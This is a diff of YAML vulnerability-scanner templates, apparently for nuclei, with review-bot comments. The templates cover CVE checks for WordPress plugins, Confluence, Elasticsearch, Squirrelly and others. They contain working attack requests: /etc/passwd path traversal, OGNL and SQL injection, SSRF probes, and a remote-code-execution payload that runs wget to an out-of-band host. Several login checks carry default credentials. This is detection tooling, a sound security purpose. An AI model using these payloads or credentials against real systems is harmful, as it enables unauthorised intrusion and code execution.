- "root:.*:0:0"
|
||||
@ -1,26 +0,0 @@
id: CVE-2019-9618
|
||||
|
||||
info:
|
||||
name: GraceMedia Media Player 1.0 - Local File Inclusion
|
||||
author: 0x_Akoko
|
||||
severity: critical
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/46537
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-9618
|
||||
tags: cve,cve2019,wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
@ -0,0 +1,34 @@
id: CVE-2020-11547
|
||||
|
||||
info:
|
||||
name: PRTG Network Monitor < 20.1.57.1745 - Information Disclosure
|
||||
author: x6263
|
||||
severity: medium
|
||||
description: PRTG Network Monitor before 20.1.57.1745 allows remote unauthenticated attackers to obtain information about probes running or the server itself via an HTTP request.
|
||||
reference:
|
||||
- https://github.com/ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-11547
|
||||
tags: cve,cve2020,prtg,disclosure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/public/login.htm?type=probes"
|
||||
- "{{BaseURL}}/public/login.htm?type=requests"
|
||||
|
||||
req-condition: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "contains((body_1), 'Probe #1') && contains((body_2), '<span>Configuration Requests Sent</span>')"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "prtg_network_monitor"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
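Review bot: The `dsl` matcher carries `part: body`, but the expression on the `dsl:` line already names the response parts it reads (`body_1`, `body_2`), so the `part:` key is presumably ignored there and only suggests a scoping that does not happen. Dropping it, along with the redundant parentheses, leaves `- "contains(body_1, 'Probe #1') && contains(body_2, '<span>Configuration Requests Sent</span>')"`. Because `req-condition: true` changes what the plain `word` and `status` matchers below are evaluated against, a one-line comment above `matchers:` stating that they run over the combined responses would help the next reader.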
@ -0,0 +1,25 @@
id: CVE-2020-28976
|
||||
|
||||
info:
|
||||
name: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)
|
||||
author: LogicalHunter
|
||||
severity: high
|
||||
description: The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker can make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/49189
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-28976
|
||||
tags: cve,cve2020,ssrf,wordpress,wp-plugin,oob
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}"
|
||||
- "{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}"
|
||||
- "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
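Review bot: The `description:` line has a grammatical slip, "It allows an unauthenticated attacker can make a request"; `It allows an unauthenticated attacker to make a request to any internal or external server via /includes/lib/detail.php?subdomain=SSRF.` reads correctly. `Wordpress` on the `name:` line is also spelled `WordPress` in the description and in the other templates of this commit.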
@ -4,6 +4,7 @@ info:
name: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: The EventON plugin through 3.0.5 for WordPress allows addons/?q= XSS via the search field.
|
||||
reference:
|
||||
- https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-29395
|
||||
@ -13,9 +13,6 @@ info:
- https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78
|
||||
- https://www.hpe.com/us/en/home.html # vendor homepage
|
||||
|
||||
# This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
|
||||
# The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
@ -0,0 +1,36 @@
id: CVE-2021-22145
|
||||
|
||||
info:
|
||||
name: ElasticSearch 7.13.3 - Memory disclosure
|
||||
author: dhiyaneshDk
|
||||
severity: medium
|
||||
description: A memory disclosure vulnerability was identified in Elasticsearch 7.10.0 to 7.13.3 error reporting. A user with the ability to submit arbitrary queries to Elasticsearch could submit a malformed query that would result in an error message returned containing previously used portions of a data buffer. This buffer could contain sensitive information such as Elasticsearch documents or authentication details.
|
||||
reference:
|
||||
- https://github.com/jaeles-project/jaeles-signatures/blob/e9595197c80521d64e31b846808095dd07c407e9/cves/elasctic-memory-leak-cve-2021-22145.yaml
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-22145
|
||||
- https://packetstormsecurity.com/files/163648/ElasticSearch-7.13.3-Memory-Disclosure.html
|
||||
tags: cve,cve2021,elascticsearch
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- '{{BaseURL}}/_bulk'
|
||||
headers:
|
||||
Content-Type: application/json
|
||||
body: |
|
||||
@
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'root_cause'
|
||||
- 'truncated'
|
||||
- 'reason'
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 400
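Review bot: The `tags:` line spells the product `elascticsearch`, so tag-based selection and the README tag counts will never group this template with other Elasticsearch templates; `tags: cve,cve2021,elasticsearch` fixes it. `author: dhiyaneshDk` also differs in case from the `dhiyaneshdk` used in the README author table updated by this commit — if the statistics script does not normalise case, that splits the author count.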
@ -18,7 +18,9 @@ requests:
- "{{BaseURL}}/revive/www/delivery/lg.php?dest=http://example.com"
|
||||
- "{{BaseURL}}/www/delivery/lg.php?dest=http://example.com"
|
||||
|
||||
stop-at-first-match: true
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
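Review bot: `redirects: true` with `max-redirects: 2` on an open-redirect probe (`dest=http://example.com`) means the matchers see the final hop's response, not the first; if the status matcher that starts at the end of this hunk expects the redirect itself (a 3xx with a `Location` pointing at example.com), it will instead be evaluated against example.com's own reply. Either drop `redirects: true` and match on the `Location` header, or add a comment stating why following the redirect is wanted here. The matchers block continues outside the hunk.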
|
||||
@ -0,0 +1,20 @@
id: CVE-2021-24288
|
||||
|
||||
info:
|
||||
name: AcyMailing < 7.5.0 - Open Redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: When using acymailing to subscribe to a newsletter, you make a POST request with various parameters. Turning that to a GET request and adding the parameters as GET parameters, you can successfully go through with the subscription.
|
||||
reference: https://wpscan.com/vulnerability/56628862-1687-4862-9ed4-145d8dfbca97
|
||||
tags: wordpress,cve,cve2021,redirect,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://example.com&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
|
||||
part: header
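Review bot: The request is not read-only: `task=subscribe` with `user[email]=example@mail.com` submits a newsletter subscription on the scanned site, and the description should say so, e.g. `Note: the probe also subscribes the placeholder address example@mail.com to the target's list.` The description never mentions the redirect that the `Location` matcher verifies; stating that the `redirect` parameter is reflected into the `Location` header would tie it to the `name`. `ctrl=frontusers` is duplicated in the query string and one copy can go. `reference:` is a bare scalar here while the other new templates in this commit use a list.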
@ -5,6 +5,7 @@ info:
author: johnjhacking
|
||||
severity: medium
|
||||
tags: cve,cve2021,wp-plugin,wordpress,xss
|
||||
description: The Marmoset Viewer WordPress plugin before 1.9.3 does not property sanitize, validate or escape the 'id' parameter before outputting back in the page, leading to a reflected Cross-Site Scripting issue.
|
||||
reference:
|
||||
- https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/
|
||||
- https://wordpress.org/plugins/marmoset-viewer/#developers
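Review bot: Typo in the description on the context line above: `does not property sanitize` should read `does not properly sanitize`. The rest of the hunk is metadata only.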
|
||||
@ -0,0 +1,47 @@
id: CVE-2021-26084
|
||||
|
||||
info:
|
||||
author: dhiyaneshDk,philippedelteil
|
||||
severity: critical
|
||||
name: Confluence Server OGNL injection - RCE
|
||||
description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if ‘Allow people to sign up to create their account’ is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
|
||||
tags: cve,cve2021,rce,confluence
|
||||
reference:
|
||||
- https://jira.atlassian.com/browse/CONFSERVER-67940
|
||||
- https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-26084
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-26084
|
||||
- https://github.com/Udyz/CVE-2021-26084
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /{{path}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
|
||||
|
||||
payloads:
|
||||
path:
|
||||
- pages/createpage-entervariables.action?SpaceKey=x
|
||||
- confluence/pages/createpage-entervariables.action?SpaceKey=x
|
||||
- wiki/pages/createpage-entervariables.action?SpaceKey=x
|
||||
- pages/doenterpagevariables.action
|
||||
- pages/createpage.action?spaceKey=myproj
|
||||
- pages/templates2/viewpagetemplate.action
|
||||
- pages/createpage-entervariables.action
|
||||
- template/custom/content-editor
|
||||
- templates/editor-preload-container
|
||||
- users/user-dark-features
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'value="aaaa{140592=null}'
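Review bot: The body match `value="aaaa{140592=null}` depends on the `#{16*8787}` expression in the raw request, and nothing in the file records that link; a comment next to the words entry such as `# 140592 == 16*8787: the arithmetic in the request body was evaluated server-side` keeps a later payload edit from silently breaking the match. `name` omits the CVE id and the affected-version range that the description gives; `name: Atlassian Confluence Server - OGNL Injection RCE (CVE-2021-26084)` would make findings self-describing.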
@ -0,0 +1,33 @@
id: CVE-2021-28918
|
||||
|
||||
info:
|
||||
name: Netmask NPM Package SSRF
|
||||
author: johnjhacking
|
||||
severity: critical
|
||||
description: Improper input validation of octal strings in netmask npm package allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts.
|
||||
tags: cve,cve2021,npm,netmask,ssrf,lfi
|
||||
reference:
|
||||
- https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-28918
|
||||
- https://github.com/advisories/GHSA-pch5-whg9-qr2r
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/?url=http://0177.0.0.1/server-status"
|
||||
- "{{BaseURL}}/?host=http://0177.0.0.1/server-status"
|
||||
- "{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Apache Server Status"
|
||||
- "Server Version"
|
||||
condition: and
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
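Review bot: Nothing in the probe is specific to the netmask package: `?url=`, `?host=` and `?file=` are sent to the site root, and the matchers accept any Apache status page or any `/etc/passwd` content, so a hit on an unrelated application is reported as CVE-2021-28918 at severity critical. Attribution needs a signal tied to netmask's octal parsing — for instance a differential check showing that the octal form `0177.0.0.1` is accepted where the equivalent dotted-decimal address is filtered — or the template should be presented as a generic SSRF/LFI check with the CVE as a reference only. The third path (`file=http://0177.0.0.1/etc/passwd`) asks the target to fetch `/etc/passwd` from its own web server, which only succeeds if that path is served; the description should say what that request is expected to demonstrate.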
@ -0,0 +1,28 @@
id: CVE-2021-31856
|
||||
|
||||
info:
|
||||
name: Layer5 Meshery 0.5.2 SQLi
|
||||
author: princechaddha
|
||||
severity: critical
|
||||
description: A SQL Injection vulnerability in the REST API in Layer5 Meshery 0.5.2 allows an attacker to execute arbitrary SQL commands via the /experimental/patternfiles endpoint (order parameter in GetMesheryPatterns in models/meshery_pattern_persister.go).
|
||||
reference:
|
||||
- https://github.com/ssst0n3/CVE-2021-31856
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-31856
|
||||
tags: sqli,cve,cve2021
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5('nuclei'))&page=0&page_size=0"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "709b38b27304df6257a86a60df742c4c"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
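Review bot: The description names the endpoint `/experimental/patternfiles` (plural) while the request path is `/api/experimental/patternfile` (singular); one of them is wrong and the description should quote the path the template actually requests. The md5 match ties the finding to the injected `select(md5('nuclei'))`, but that relationship lives only in the reader's head; a comment beside the words entry, `# md5('nuclei') as returned by the injected subquery`, would record it.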
@ -0,0 +1,26 @@
id: CVE-2021-32819
|
||||
|
||||
info:
|
||||
name: Nodejs squirrelly template engine RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: |
|
||||
Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration
|
||||
options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is
|
||||
currently no fix for these issues as of the publication of this CVE. The latest version of squirrelly is currently 8.0.8. For complete details refer to the referenced GHSL-2021-023.
|
||||
reference:
|
||||
- https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/
|
||||
- https://www.linuxlz.com/aqld/2331.html
|
||||
- https://blog.diefunction.io/vulnerabilities/ghsl-2021-023
|
||||
tags: cve,cve2021,nodejs,rce,oob
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//'
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
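Review bot: The request is not a passive detection but real command execution on the target — the `defaultFilter` value reaches `child_process.exec` and runs an outbound `wget` to the interactsh host — and neither `name` nor `description` says so; add a sentence like `The check executes an outbound wget on the target and confirms code execution through interactsh.` so operators know what running it does. `description: |` keeps the source line breaks in the middle of sentences; `description: >-` folds them into one paragraph and drops the trailing newline.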
@ -0,0 +1,23 @@
id: CVE-2021-34370
|
||||
|
||||
info:
|
||||
name: Accela Civic Platform 21.1 - Open Redirect & XSS
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: Accela Civic Platform Cross-Site-Scripting and Open Redirect <= 21.1
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/49990
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-34370
|
||||
- https://www.accela.com/civic-platform/
|
||||
tags: xss,redirect,cve,cve2021
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
|
||||
part: header
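Review bot: `name` and `tags` claim cross-site scripting, but the only matcher is the `Location` regex for `example.com`, so the template validates the open redirect alone; either drop `xss` from the name and tags or add a matcher for the reflected payload. The description merely restates the name; naming the vulnerable parameter (`successURL`) and the expected `Location` response would make the finding self-explanatory.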
@ -0,0 +1,65 @@
id: cs141-default-login
|
||||
|
||||
info:
|
||||
name: CS141 SNMP Module Default Credentials
|
||||
author: socketz
|
||||
severity: medium
|
||||
reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf
|
||||
tags: hiawatha,iot,default-login
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /api/login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Length: 44
|
||||
Accept: application/json, text/plain, */*
|
||||
Content-Type: application/json
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en,es-ES;q=0.9,es;q=0.8
|
||||
Connection: close
|
||||
|
||||
{"userName":"admin","password":"cs141-snmp"}
|
||||
|
||||
- |
|
||||
POST /api/login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Length: 44
|
||||
Accept: application/json, text/plain, */*
|
||||
Content-Type: application/json
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en,es-ES;q=0.9,es;q=0.8
|
||||
Connection: close
|
||||
|
||||
{"userName":"engineer","password":"engineer"}
|
||||
|
||||
- |
|
||||
POST /api/login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Length: 44
|
||||
Accept: application/json, text/plain, */*
|
||||
Content-Type: application/json
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en,es-ES;q=0.9,es;q=0.8
|
||||
Connection: close
|
||||
|
||||
{"userName":"guest","password":"guest"}
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'accessToken'
|
||||
- 'application/json'
|
||||
condition: and
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
- accessToken
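Review bot: `Content-Length: 44` is hard-coded in all three raw requests but only the first body is 44 bytes — the `engineer` body is 45 and the `guest` body 39 — so the header is wrong for two of them; as far as I know nuclei recomputes the length for raw requests unless `unsafe: true` is set, but the stale value is misleading and would truncate or stall the request under `unsafe`, so drop the header (the browser-emulation `Accept-*` headers add nothing to the login either). The word matcher looks for `accessToken` with `part: header` and the `kval` extractor also reads it as a header or cookie name; if the device returns the token in the JSON body instead, neither will ever fire, so confirm where `accessToken` actually appears in the login response.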
@ -50,7 +50,7 @@ requests:
- password
|
||||
|
||||
attack: pitchfork # Available options: sniper, pitchfork and clusterbomb
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
@ -0,0 +1,54 @@
id: vidyo-default-credentials
|
||||
|
||||
info:
|
||||
name: Vidyo Default Credentials
|
||||
author: izn0u
|
||||
severity: medium
|
||||
description: test for default cred super:password
|
||||
reference: https://support.vidyocloud.com/hc/en-us/articles/226265128
|
||||
tags: vidyo,default-login
|
||||
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /super/login.html?lang=en HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
|
||||
- |
|
||||
POST /super/super_security_check;jsessionid={{session}}?csrf_tkn={{csrf_tkn}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Origin: {{BaseURL}}
|
||||
Referer: {{RootURL}}/super/login.html?lang=en
|
||||
Cookie: JSESSIONID={{session}} ; VidyoPortalSuperLanguage=en
|
||||
|
||||
username=super&password=password
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: csrf_tkn
|
||||
group: 1
|
||||
part: body
|
||||
internal: true
|
||||
regex:
|
||||
- 'csrf_tkn=([A-Za-z0-9.-]+)'
|
||||
|
||||
- type: kval
|
||||
name: session
|
||||
internal: true
|
||||
part: header
|
||||
kval:
|
||||
- JSESSIONID
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "/super/index.html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 302
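Review bot: `description: test for default cred super:password` does not describe the check; something like `description: Logs into the Vidyo super-admin portal with the default super:password credentials, first fetching the login page to obtain the JSESSIONID cookie and csrf_tkn that the POST requires.` documents the two-step flow the `internal` extractors implement. There are two blank lines before `requests:` where one is used elsewhere in this commit. The header match on `/super/index.html` with status 302 presumably relies on nuclei evaluating the matchers against the last response of the raw sequence; a short comment saying so would help readers.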
@ -0,0 +1,28 @@
id: wso2-management-console-default-password
|
||||
|
||||
info:
|
||||
name: WSO2 Management Console Default Password
|
||||
author: cocxanh
|
||||
severity: high
|
||||
reference: https://docs.wso2.com/display/UES100/Accessing+the+Management+Console
|
||||
tags: default-login,wso2
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /carbon/admin/login_action.jsp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Connection: close
|
||||
Content-Length: 29
|
||||
|
||||
username=admin&password=admin
|
||||
redirects: false
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "/carbon/admin/index.jsp?loginStatus=true"
|
||||
- "JSESSIONID"
|
||||
part: header
|
||||
condition: and
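Review bot: There is no `description`; add one such as `description: Checks whether the WSO2 Carbon management console accepts the default admin:admin credentials.` so the finding is self-describing like the other default-login templates in this commit. `redirects: false` is the right choice because the success signal is the redirect itself (`/carbon/admin/index.jsp?loginStatus=true` plus `JSESSIONID` in the headers); a comment `# do not follow: the login redirect is the success signal` records why.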
@ -22,6 +22,7 @@ requests:
- '{{BaseURL}}/sql.php'
|
||||
- '{{BaseURL}}/wp-content/plugins/adminer/adminer.php'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
@ -1,11 +1,11 @@
id: cisco-security-details
|
||||
id: cisco-meraki-exposure
|
||||
|
||||
info:
|
||||
name: Cisco Meraki cloud & Security Appliance details
|
||||
author: dhiyaneshDK
|
||||
name: Cisco Meraki cloud & security Appliances Information Disclosure
|
||||
author: dhiyaneshDK,r3naissance
|
||||
severity: info
|
||||
reference: https://www.exploit-db.com/ghdb/6708
|
||||
tags: panel,cisco
|
||||
tags: panel,cisco,meraki,disclosure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
@ -17,6 +17,9 @@ requests:
- type: word
|
||||
words:
|
||||
- 'Your client connection'
|
||||
- 'This security appliance is directly connected to a local network'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
@ -13,7 +13,13 @@ requests:
- '{{BaseURL}}/dbconsole/'
|
||||
- '{{BaseURL}}/h2-console/'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<title>H2 Console</title>"
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "Sorry, remote connections ('webAllowOthers') are disabled on this server"
|
||||
negative: true
|
||||
@ -13,6 +13,7 @@ requests:
- "{{BaseURL}}/jira/secure/Dashboard.jspa"
|
||||
- "{{BaseURL}}/login.jsp"
|
||||
|
||||
stop-at-first-match: true
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers:
|
||||
@ -22,10 +22,12 @@ requests:
- "{{BaseURL}}/xampp/phpmyadmin/"
|
||||
- "{{BaseURL}}/phpMyAdmin/"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<title>phpMyAdmin"
|
||||
- "pmahomme"
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
@ -14,6 +14,8 @@ requests:
- '{{BaseURL}}/zp/zp-core/setup/index.php'
|
||||
- '{{BaseURL}}/gallery/zp-core/setup/index.php'
|
||||
- '{{BaseURL}}/zenphoto/zp-core/setup/index.php'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
@ -14,6 +14,7 @@ requests:
- '{{BaseURL}}/sphider/admin/admin.php'
|
||||
- '{{BaseURL}}/search/admin/admin.php'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
@ -51,6 +51,7 @@ requests:
- "{{BaseURL}}/api/v1/swagger-ui/swagger.yaml"
|
||||
- "{{BaseURL}}/swagger-resources/restservices/v2/api-docs"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
@ -17,26 +17,27 @@ requests:
- "{{BaseURL}}/api/application.wadl"
|
||||
- "{{BaseURL}}/api/v1/application.wadl"
|
||||
- "{{BaseURL}}/api/v2/application.wadl"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- name: http-get
|
||||
type: word
|
||||
words:
|
||||
- "This is simplified WADL with user and core resources only"
|
||||
- "\"http://jersey.java.net/\""
|
||||
- "http://jersey.java.net"
|
||||
- "http://wadl.dev.java.net/2009/02"
|
||||
condition: or
|
||||
part: body
|
||||
|
||||
- method: OPTIONS
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
- "{{BaseURL}}/api/v1"
|
||||
- "{{BaseURL}}/api/v2"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- name: http-options
|
||||
type: word
|
||||
words:
|
||||
- "This is simplified WADL with user and core resources only"
|
||||
- "\"http://jersey.java.net/\""
|
||||
- "http://jersey.java.net"
|
||||
- "http://wadl.dev.java.net/2009/02"
|
||||
condition: or
|
||||
part: body
|
||||
@ -24,3 +24,7 @@ requests:
words:
|
||||
- "application/octet-stream"
|
||||
part: header
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'len(body) > 2'
|
||||
@ -19,6 +19,7 @@ requests:
- "{{BaseURL}}/docker-compose-dev.yml"
|
||||
- "{{BaseURL}}/docker-compose.override.yml"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
@ -22,8 +22,8 @@ requests:
- '{{BaseURL}}/events../.git/config'
|
||||
- '{{BaseURL}}/media../.git/config'
|
||||
- '{{BaseURL}}/lib../.git/config'
|
||||
headers:
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
@ -14,6 +14,7 @@ requests:
- "{{BaseURL}}/axis2-web/HappyAxis.jsp"
|
||||
- "{{BaseURL}}/happyaxis.jsp"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
@ -29,6 +29,7 @@ requests:
- '(?i)password(lessauth|requirementsashtmllist|emailnotfoundmessage|label|errormessage|message|_checkemail_title|_newfield_retype|_text_new|login_submit|_has_expired_title|_has_expired_text|_error|_hint|_strength)'
|
||||
- '(?i)(!native)|(.*keybindings)'
|
||||
- '(?i)(layout|a)key'
|
||||
- '(?i)token_expires_in'
|
||||
condition: or
|
||||
negative: true
|
||||
|
||||
@ -25,7 +25,7 @@ requests:
|
||||
attack: sniper
|
||||
threads: 50
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
@ -18,8 +18,9 @@ requests:
header: helpers/payloads/request-headers.txt
|
||||
payload: helpers/payloads/command-injection.txt
|
||||
attack: clusterbomb
|
||||
redirects: true
|
||||
|
||||
redirects: true
|
||||
stop-at-first-match: true
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: word
|
||||
@ -22,7 +22,7 @@ requests:
attack: sniper
|
||||
threads: 50
|
||||
max-size: 500 # Size in bytes - Max Size to read from server response
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: binary
|
||||
@ -22,7 +22,7 @@ requests:
passwords: helpers/wordlists/wp-passwords.txt
|
||||
threads: 50
|
||||
attack: clusterbomb
|
||||
|
||||
